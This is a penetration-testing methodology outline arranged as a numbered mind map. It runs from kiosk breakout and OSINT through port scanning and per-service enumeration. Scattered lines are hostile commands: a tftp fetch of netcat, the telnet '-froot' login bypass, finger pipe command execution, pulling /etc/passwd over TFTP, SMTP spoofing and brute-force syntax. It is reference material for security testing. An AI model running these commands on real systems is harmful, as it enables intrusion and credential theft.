Back to Public Maps
Penetration Testing Framework 0.58
by kevin orrey 01/28/2017
Penetration Testing Framework 0.58
by kevin orrey
1. Manual Testing
1.1. Create Batch File (cmd.bat)
1.1.1. 1
1.1.1.1. cmd.exe
1.1.2. 2
1.1.2.1. echo off
1.1.2.2. command
1.1.2.3. echo on
1.2. Host Scripting File (cmd.vbs)
1.2.1. Option Explicit
1.2.2. Dim objShell
1.2.3. objShell.Run "%comspec% /k"
1.2.4. WScript.Quit
1.2.5. alternative functionality
1.2.5.1. objShell.Run "%comspec% /k c: & dir"
1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
1.3. iKat
1.3.1. Integrated Kiosk Attack Tool
1.3.1.1. Reconnaissance
1.3.1.2. FileSystem Links
1.3.1.3. Common Dialogs
1.3.1.4. Application Handlers
1.3.1.5. Browser Plugins
1.3.1.6. iKAT Tools
1.4. AT Command - priviledge escalation
1.4.1. AT HH:MM /interactive "cmd.exe"
1.4.2. AT HH:MM /interactive %comspec% /k
1.4.3. Untitled
1.5. Keyboard Shortcuts/ Hotkeys
1.5.1. Ctrl + h – View History
1.5.2. Ctrl + n – New Browser
1.5.3. Shift + Left Click – New Browser
1.5.4. Ctrl + o – Internet Address (browse feature)
1.5.5. Ctrl + p – Print (to file)
1.5.6. Right Click (Shift + F10)
1.5.6.1. Save Image As
1.5.6.2. View Source
1.5.7. F1 – Jump to URL
1.5.8. SHIFT+F1: Local Task List
1.5.9. SHIFT+F2: Toggle Title Bar
1.5.10. SHIFT+F3: Close Remote Application
1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
1.5.12. CTRL+F2: Remote Task List
1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
1.5.14. ALT+F2: Cycle through programs
1.5.15. ALT+PLUS: Alt+TAB
1.5.16. ALT+MINUS: ALT+SHIFT+TAB
2. inurl:Citrix/AccessPlatform/auth/login.aspx
3. X11 port 6000^ open
3.1. X11 Enumeration
3.1.1. List open windows
3.1.2. Authentication Method
3.1.2.1. Xauth
3.1.2.2. Xhost
3.2. X11 Exploitation
3.2.1. xwd
3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
3.2.2. Keystrokes
3.2.2.1. Received
3.2.2.2. Transmitted
3.2.3. Screenshots
3.2.4. xhost +
3.3. Examine Configuration Files
3.3.1. /etc/Xn.hosts
3.3.2. /usr/lib/X11/xdm
3.3.2.1. Untitled
3.3.3. /usr/lib/X11/xdm/xsession
3.3.4. /usr/lib/X11/xdm/xsession-remote
3.3.5. /usr/lib/X11/xdm/xsession.0
3.3.6. /usr/lib/X11/xdm/xdm-config
3.3.6.1. DisplayManager*authorize:on
4. pwdump [-h][-o][-u][-p] machineName
5. Nabil contributed the AS/400 section.
6. Client Side Security
7. Back end files
7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
8. Set objShell = CreateObject("WScript.Shell")
9. Check visible areas for sensitive information.
10. InitialProgram=c:\windows\system32\cmd.exe
11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
12. http://secunia.com/advisories/search/?search=citrix
13. Pre-Inspection Visit - template
14. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
14.1. Untitled
14.1.1. Authoratitive Bodies
14.1.1.1. IANA - Internet Assigned Numbers Authority
14.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
14.1.1.3. NRO - Number Resource Organisation
14.1.1.4. RIR - Regional Internet Registry
14.1.1.4.1. AFRINIC - African Network Information Centre
14.1.1.4.2. APNIC - Asia Pacific Network Information Centre
14.1.1.4.3. ARIN - American Registry for Internet Numbers
14.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
14.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
14.1.2. Websites
14.1.2.1. Central Ops
14.1.2.1.1. Domain Dossier
14.1.2.1.2. Email Dossier
14.1.2.2. DNS Stuff
14.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
14.1.2.3. Fixed Orbit
14.1.2.3.1. Autonomous System lookups and other online tools available.
14.1.2.4. Geektools
14.1.2.5. IP2Location
14.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
14.1.2.6. Kartoo
14.1.2.6.1. Metasearch engine that visually presents its results.
14.1.2.7. MyIPNeighbors.com
14.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
14.1.2.8. My-IP-Neighbors.com
14.1.2.8.1. Excellent site that can be used if the above is down
14.1.2.9. myipneighbors.net
14.1.2.10. Netcraft
14.1.2.10.1. Online search tool allowing queries for host information.
14.1.2.11. Passive DNS Replication
14.1.2.11.1. Finds shared domains based on supplied IP addresses
14.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
14.1.2.12. Robtex
14.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
14.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
14.1.2.13. Traceroute.org
14.1.2.13.1. Website listing a large number links to online traceroute resources.
14.1.2.14. Wayback Machine
14.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
14.1.2.15. Whois.net
14.1.3. Tools
14.1.3.1. Cheops-ng
14.1.3.2. Country whois
14.1.3.3. Domain Research Tool
14.1.3.4. Firefox Plugins
14.1.3.4.1. AS Number
14.1.3.4.2. Shazou
14.1.3.4.3. Firecat Suite
14.1.3.5. Gnetutil
14.1.3.6. Goolag Scanner
14.1.3.7. Greenwich
14.1.3.8. Maltego
14.1.3.9. GTWhois
14.1.3.10. Sam Spade
14.1.3.11. Smart whois
14.1.3.12. SpiderFoot
14.2. Internet Search
14.2.1. General Information
14.2.1.1. Web Investigator
14.2.1.2. Tracesmart
14.2.1.3. Friends Reunited
14.2.1.4. Ebay - profiles etc.
14.2.2. Financial
14.2.2.1. EDGAR - Company information, including real-time filings. US
14.2.2.2. Google Finance - General Finance Portal
14.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
14.2.2.4. Companies House UK
14.2.2.5. Land Registry UK
14.2.3. Phone book/ Electoral Role Information
14.2.3.1. 123people
14.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
14.2.3.2. 192.com
14.2.3.2.1. Electoral Role Search. UK
14.2.3.3. 411
14.2.3.3.1. Online White Pages and Yellow Pages. US
14.2.3.4. Untitled
14.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
14.2.3.5. BT.com. UK
14.2.3.5.1. Residential
14.2.3.5.2. Business
14.2.3.6. Pipl
14.2.3.6.1. Untitled
14.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
14.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
14.2.3.7. Spokeo
14.2.3.7.1. http://www.spokeo.com/user?q=domain_name
14.2.3.7.2. http://www.spokeo.com/user?q=email_address
14.2.3.8. Yasni
14.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
14.2.3.9. Zabasearch
14.2.3.9.1. People Search Engine. US
14.2.4. Generic Web Searching
14.2.4.1. Code Search
14.2.4.2. Forum Entries
14.2.4.3. Google Hacking Database
14.2.4.4. Google
14.2.4.4.1. Email Addresses
14.2.4.4.2. Contact Details
14.2.4.5. Newsgroups/forums
14.2.4.6. Blog Search
14.2.4.6.1. Yammer
14.2.4.6.2. Google Blog Search
14.2.4.6.3. Technorati
14.2.4.6.4. Jaiku
14.2.4.6.5. Present.ly
14.2.4.6.6. Twitter Network Browser
14.2.4.7. Search Engine Comparison/ Aggregator Sites
14.2.4.7.1. Clusty
14.2.4.7.2. Grokker
14.2.4.7.3. Zuula
14.2.4.7.4. Exalead
14.2.4.7.5. Delicious
14.2.5. Metadata Search
14.2.5.1. Untitled
14.2.5.1.1. MetaData Visualisation Sites
14.2.5.1.2. Tools
14.2.5.1.3. Wikipedia Metadata Search
14.2.6. Social/ Business Networks
14.2.6.1. Untitled
14.2.6.1.1. Africa
14.2.6.1.2. Australia
14.2.6.1.3. Belgium
14.2.6.1.4. Holland
14.2.6.1.5. Hungary
14.2.6.1.6. Iran
14.2.6.1.7. Japan
14.2.6.1.8. Korea
14.2.6.1.9. Poland
14.2.6.1.10. Russia
14.2.6.1.11. Sweden
14.2.6.1.12. UK
14.2.6.1.13. US
14.2.6.1.14. Assorted
14.2.7. Resources
14.2.7.1. OSINT
14.2.7.2. International Directory of Search Engines
14.3. DNS Record Retrieval from publically available servers
14.3.1. Types of Information Records
14.3.1.1. SOA Records - Indicates the server that has authority for the domain.
14.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
14.3.1.3. NS Records - List of a host’s or domain’s name server(s).
14.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
14.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
14.3.1.6. SRV Records - Service location record.
14.3.1.7. HINFO Records - Host information record with CPU type and operating system.
14.3.1.8. TXT Records - Generic text record.
14.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
14.3.1.10. RP - Responsible person for the domain.
14.3.2. Database Settings
14.3.2.1. Version.bind
14.3.2.2. Serial
14.3.2.3. Refresh
14.3.2.4. Retry
14.3.2.5. Expiry
14.3.2.6. Minimum
14.3.3. Sub Domains
14.3.4. Internal IP ranges
14.3.4.1. Reverse DNS for IP Range
14.3.5. Zone Transfer
14.4. Social Engineering
14.4.1. Remote
14.4.1.1. Phone
14.4.1.1.1. Scenarios
14.4.1.1.2. Results
14.4.1.1.3. Contact Details
14.4.1.2. Email
14.4.1.2.1. Scenarios
14.4.1.2.2. Software
14.4.1.2.3. Results
14.4.1.2.4. Contact Details
14.4.1.3. Other
14.4.2. Local
14.4.2.1. Personas
14.4.2.1.1. Name
14.4.2.1.2. Phone
14.4.2.1.3. Email
14.4.2.1.4. Business Cards
14.4.2.2. Contact Details
14.4.2.2.1. Name
14.4.2.2.2. Phone number
14.4.2.2.3. Email
14.4.2.2.4. Room number
14.4.2.2.5. Department
14.4.2.2.6. Role
14.4.2.3. Scenarios
14.4.2.3.1. New IT employee
14.4.2.3.2. Fire Inspector
14.4.2.4. Results
14.4.2.5. Maps
14.4.2.5.1. Satalitte Imagery
14.4.2.5.2. Building layouts
14.4.2.6. Other
14.5. Dumpster Diving
14.5.1. Rubbish Bins
14.5.2. Contract Waste Removal
14.5.3. Ebay ex-stock sales i.e. HDD
14.6. Web Site copy
14.6.1. htttrack
14.6.2. teleport pro
14.6.3. Black Widow
15. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
15.1. Default Port Lists
15.1.1. Windows
15.1.2. *nix
15.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
15.2.1. General Enumeration Tools
15.2.1.1. nmap
15.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
15.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
15.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
15.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
15.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
15.2.1.2. netcat
15.2.1.2.1. nc -v -n IP_Address port
15.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
15.2.1.3. amap
15.2.1.3.1. amap -bqv 192.168.1.1 80
15.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
15.2.1.4. xprobe2
15.2.1.4.1. xprobe2 192.168.1.1
15.2.1.5. sinfp
15.2.1.5.1. ./sinfp.pl -i -p
15.2.1.6. nbtscan
15.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
15.2.1.7. hping
15.2.1.7.1. hping ip_address
15.2.1.8. scanrand
15.2.1.8.1. scanrand ip_address:all
15.2.1.9. unicornscan
15.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
15.2.1.10. netenum
15.2.1.10.1. netenum network/netmask timeout
15.2.1.11. fping
15.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
15.2.2. Firewall Specific Tools
15.2.2.1. firewalk
15.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
15.2.2.2. ftester
15.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
15.2.3. Default Passwords (Examine list)
15.2.3.1. Passwords A
15.2.3.2. Passwords B
15.2.3.3. Passwords C
15.2.3.4. Passwords D
15.2.3.5. Passwords E
15.2.3.6. Passwords F
15.2.3.7. Passwords G
15.2.3.8. Passwords H
15.2.3.9. Passwords I
15.2.3.10. Passwords J
15.2.3.11. Passwords K
15.2.3.12. Passwords L
15.2.3.13. Passwords M
15.2.3.14. Passwords N
15.2.3.15. Passwords O
15.2.3.16. Passwords P
15.2.3.17. Passwords R
15.2.3.18. Passwords S
15.2.3.19. Passwords T
15.2.3.20. Passwords U
15.2.3.21. Passwords V
15.2.3.22. Passwords W
15.2.3.23. Passwords X
15.2.3.24. Passwords Y
15.2.3.25. Passwords Z
15.2.3.26. Passwords (Numeric)
15.3. Active Hosts
15.3.1. Open TCP Ports
15.3.2. Closed TCP Ports
15.3.3. Open UDP Ports
15.3.4. Closed UDP Ports
15.3.5. Service Probing
15.3.5.1. SMTP Mail Bouncing
15.3.5.2. Banner Grabbing
15.3.5.2.1. Other
15.3.5.2.2. HTTP
15.3.5.2.3. HTTPS
15.3.5.2.4. SMTP
15.3.5.2.5. POP3
15.3.5.2.6. FTP
15.3.6. ICMP Responses
15.3.6.1. Type 3 (Port Unreachable)
15.3.6.2. Type 8 (Echo Request)
15.3.6.3. Type 13 (Timestamp Request)
15.3.6.4. Type 15 (Information Request)
15.3.6.5. Type 17 (Subnet Address Mask Request)
15.3.6.6. Responses from broadcast address
15.3.7. Source Port Scans
15.3.7.1. TCP/UDP 53 (DNS)
15.3.7.2. TCP 20 (FTP Data)
15.3.7.3. TCP 80 (HTTP)
15.3.7.4. TCP/UDP 88 (Kerberos)
15.3.8. Firewall Assessment
15.3.8.1. Firewalk
15.3.8.2. TCP/UDP/ICMP responses
15.3.9. OS Fingerprint
16. Enumeration
16.1. Daytime port 13 open
16.1.1. nmap nse script
16.1.1.1. daytime
16.2. FTP port 21 open
16.2.1. Fingerprint server
16.2.1.1. telnet ip_address 21 (Banner grab)
16.2.1.2. Run command ftp ip_address
16.2.1.3. [email protected]
16.2.1.4. Check for anonymous access
16.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]
16.2.2. Password guessing
16.2.2.1. Hydra brute force
16.2.2.2. medusa
16.2.2.3. Brutus
16.2.3. Examine configuration files
16.2.3.1. ftpusers
16.2.3.2. ftp.conf
16.2.3.3. proftpd.conf
16.2.4. MiTM
16.2.4.1. pasvagg.pl
16.3. SSH port 22 open
16.3.1. Fingerprint server
16.3.1.1. telnet ip_address 22 (banner grab)
16.3.1.2. scanssh
16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
16.3.2. Password guessing
16.3.2.1. ssh [email protected]_address
16.3.2.2. guess-who
16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
16.3.2.3. Hydra brute force
16.3.2.4. brutessh
16.3.2.5. Ruby SSH Bruteforcer
16.3.3. Examine configuration files
16.3.3.1. ssh_config
16.3.3.2. sshd_config
16.3.3.3. authorized_keys
16.3.3.4. ssh_known_hosts
16.3.3.5. .shosts
16.3.4. SSH Client programs
16.3.4.1. tunnelier
16.3.4.2. winsshd
16.3.4.3. putty
16.3.4.4. winscp
16.4. Telnet port 23 open
16.4.1. Fingerprint server
16.4.1.1. telnet ip_address
16.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
16.4.1.2. telnetfp
16.4.2. Password Attack
16.4.2.1. Untitled
16.4.2.2. Brutus
16.4.2.3. Hydra brute force
16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
16.4.3. Examine configuration files
16.4.3.1. /etc/xinetd.d/telnet
16.4.3.2. /etc/xinetd.d/stelnet
16.5. Sendmail Port 25 open
16.5.1. Fingerprint server
16.5.1.1. telnet ip_address 25 (banner grab)
16.5.2. Mail Server Testing
16.5.2.1. Enumerate users
16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
16.5.2.2. Mail Spoof Test
16.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
16.5.2.3. /etc/inetd.conf
16.5.2.4. Mail Relay Test
16.5.2.4.1. Untitled
16.5.3. Examine Configuration Files
16.5.3.1. sendmail.cf
16.5.3.2. submit.cf
16.6. DNS port 53 open
16.6.1. Fingerprint server/ service
16.6.1.1. host
16.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
16.6.1.2. nslookup
16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
16.6.1.3. dig
16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
16.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
16.6.2. DNS Enumeration
16.6.2.1. Bile Suite
16.6.2.1.1. perl BiLE.pl [website] [project_name]
16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
16.6.2.1.5. perl exp-tld.pl [input file] [output file]
16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
16.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]
16.6.2.2. txdns
16.6.2.2.1. txdns -rt -t domain_name
16.6.2.2.2. txdns -x 50 -bb domain_name
16.6.2.3. nmap nse scripts
16.6.2.3.1. dns-random-srcport
16.6.2.3.2. dns-random-txid
16.6.2.3.3. dns-recursion
16.6.2.3.4. dns-zone-transfer
16.6.3. Examine Configuration Files
16.6.3.1. host.conf
16.6.3.2. resolv.conf
16.6.3.3. named.conf
16.7. perl qtrace.pl [ip_address_file] [output_file]
16.8. TFTP port 69 open
16.8.1. TFTP Enumeration
16.8.1.1. tftp ip_address PUT local_file
16.8.1.2. tftp ip_address GET conf.txt (or other files)
16.8.1.3. Solarwinds TFTP server
16.8.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
16.8.2. TFTP Bruteforcing
16.8.2.1. TFTP bruteforcer
16.8.2.2. Cisco-Torch
16.9. Finger Port 79 open
16.9.1. User enumeration
16.9.1.1. finger 'a b c d e f g h' @example.com
16.9.1.2. finger [email protected]
16.9.1.3. finger [email protected]
16.9.1.4. finger [email protected]
16.9.1.5. finger [email protected]
16.9.1.6. finger **@example.com
16.9.1.7. finger [email protected]
16.9.1.8. finger @example.com
16.9.1.9. nmap nse script
16.9.1.9.1. finger
16.9.2. Command execution
16.9.2.1. finger "|/bin/[email protected]"
16.9.2.2. finger "|/bin/ls -a /@example.com"
16.9.3. Finger Bounce
16.9.3.1. finger [email protected]@victim
16.9.3.2. finger @[email protected]
16.10. Web Ports 80,8080 etc. open
16.10.1. Fingerprint server
16.10.1.1. Telnet ip_address port
16.10.1.2. Firefox plugins
16.10.1.2.1. All
16.10.1.2.2. Specific
16.10.2. Crawl website
16.10.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
16.10.2.2. httprint
16.10.2.3. Metagoofil
16.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
16.10.3. Web Directory enumeration
16.10.3.1. Nikto
16.10.3.1.1. nikto [-h target] [options]
16.10.3.2. DirBuster
16.10.3.3. Wikto
16.10.3.4. Goolag Scanner
16.10.4. Vulnerability Assessment
16.10.4.1. Manual Tests
16.10.4.1.1. Default Passwords
16.10.4.1.2. Install Backdoors
16.10.4.1.3. Method Testing
16.10.4.1.4. Upload Files
16.10.4.1.5. View Page Source
16.10.4.1.6. Input Validation Checks
16.10.4.1.7. Automated table and column iteration
16.10.4.2. Vulnerability Scanners
16.10.4.2.1. Acunetix
16.10.4.2.2. Grendelscan
16.10.4.2.3. NStealth
16.10.4.2.4. Obiwan III
16.10.4.2.5. w3af
16.10.4.3. Specific Applications/ Server Tools
16.10.4.3.1. Domino
16.10.4.3.2. Joomla
16.10.4.3.3. aspaudit.pl
16.10.4.3.4. Vbulletin
16.10.4.3.5. ZyXel
16.10.5. Proxy Testing
16.10.5.1. Burpsuite
16.10.5.2. Crowbar
16.10.5.3. Interceptor
16.10.5.4. Paros
16.10.5.5. Requester Raw
16.10.5.6. Suru
16.10.5.7. WebScarab
16.10.6. Examine configuration files
16.10.6.1. Generic
16.10.6.1.1. Examine httpd.conf/ windows config files
16.10.6.2. JBoss
16.10.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
16.10.6.3. Joomla
16.10.6.3.1. configuration.php
16.10.6.3.2. diagnostics.php
16.10.6.3.3. joomla.inc.php
16.10.6.3.4. config.inc.php
16.10.6.4. Mambo
16.10.6.4.1. configuration.php
16.10.6.4.2. config.inc.php
16.10.6.5. Wordpress
16.10.6.5.1. setup-config.php
16.10.6.5.2. wp-config.php
16.10.6.6. ZyXel
16.10.6.6.1. /WAN.html (contains PPPoE ISP password)
16.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
16.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)
16.10.6.6.4. /Firewall_DefPolicy.html (Firewall)
16.10.6.6.5. /CF_Keyword.html (Content Filter)
16.10.6.6.6. /RemMagWWW.html (Remote MGMT)
16.10.6.6.7. /rpSysAdmin.html (System)
16.10.6.6.8. /LAN_IP.html (LAN)
16.10.6.6.9. /NAT_General.html (NAT)
16.10.6.6.10. /ViewLog.html (Logs)
16.10.6.6.11. /rpFWUpload.html (Tools)
16.10.6.6.12. /DiagGeneral.html (Diagnostic)
16.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)
16.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
16.10.6.6.15. Config Backups
16.10.7. Examine web server logs
16.10.7.1. c:\winnt\system32\Logfiles\W3SVC1
16.10.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
16.10.8. References
16.10.8.1. White Papers
16.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
16.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
16.10.8.1.3. Blind Security Testing - An Evolutionary Approach
16.10.8.1.4. Command Injection in XML Signatures and Encryption
16.10.8.1.5. Input Validation Cheat Sheet
16.10.8.1.6. SQL Injection Cheat Sheet
16.10.8.2. Books
16.10.8.2.1. Hacking Exposed Web 2.0
16.10.8.2.2. Hacking Exposed Web Applications
16.10.8.2.3. The Web Application Hacker's Handbook
16.10.9. Exploit Frameworks
16.10.9.1. Brute-force Tools
16.10.9.1.1. Acunetix
16.10.9.2. Metasploit
16.10.9.3. w3af
16.11. Portmapper port 111 open
16.11.1. rpcdump.py
16.11.1.1. rpcdump.py username:[email protected]_Address port/protocol (i.e. 80/HTTP)
16.11.2. rpcinfo
16.11.2.1. rpcinfo [options] IP_Address
16.12. NTP Port 123 open
16.12.1. NTP Enumeration
16.12.1.1. ntpdc -c monlist IP_ADDRESS
16.12.1.2. ntpdc -c sysinfo IP_ADDRESS
16.12.1.3. ntpq
16.12.1.3.1. host
16.12.1.3.2. hostname
16.12.1.3.3. ntpversion
16.12.1.3.4. readlist
16.12.1.3.5. version
16.12.2. Examine configuration files
16.12.2.1. ntp.conf
16.12.3. nmap nse script
16.12.3.1. ntp-info
16.13. NetBIOS Ports 135-139,445 open
16.13.1. NetBIOS enumeration
16.13.1.1. Enum
16.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
16.13.1.2. Null Session
16.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
16.13.1.3. Smbclient
16.13.1.3.1. smbclient -L //server/share password options
16.13.1.4. Superscan
16.13.1.4.1. Enumeration tab.
16.13.1.5. user2sid/sid2user
16.13.1.6. Winfo
16.13.2. NetBIOS brute force
16.13.2.1. Hydra
16.13.2.2. Brutus
16.13.2.3. Cain & Abel
16.13.2.4. getacct
16.13.2.5. NAT (NetBIOS Auditing Tool)
16.13.3. Examine Configuration Files
16.13.3.1. Smb.conf
16.13.3.2. lmhosts
16.14. SNMP port 161 open
16.14.1. Default Community Strings
16.14.1.1. public
16.14.1.2. private
16.14.1.3. cisco
16.14.1.3.1. cable-docsis
16.14.1.3.2. ILMI
16.14.2. MIB enumeration
16.14.2.1. Windows NT
16.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
16.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
16.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
16.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
16.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
16.14.2.2. Solarwinds MIB walk
16.14.2.3. Getif
16.14.2.4. snmpwalk
16.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
16.14.2.5. Snscan
16.14.2.6. Applications
16.14.2.6.1. ZyXel
16.14.2.7. nmap nse script
16.14.2.7.1. snmp-sysdescr
16.14.3. SNMP Bruteforce
16.14.3.1. onesixtyone
16.14.3.1.1. onesixytone -c SNMP.wordlist <IP>
16.14.3.2. cat
16.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist
16.14.3.3. Solarwinds SNMP Brute Force
16.14.3.4. ADMsnmp
16.14.3.5. nmap nse script
16.14.3.5.1. snmp-brute
16.14.4. Examine SNMP Configuration files
16.14.4.1. snmp.conf
16.14.4.2. snmpd.conf
16.14.4.3. snmp-config.xml
16.15. LDAP Port 389 Open
16.15.1. ldap enumeration
16.15.1.1. ldapminer
16.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
16.15.1.2. luma
16.15.1.2.1. Gui based tool
16.15.1.3. ldp
16.15.1.3.1. Gui based tool
16.15.1.4. openldap
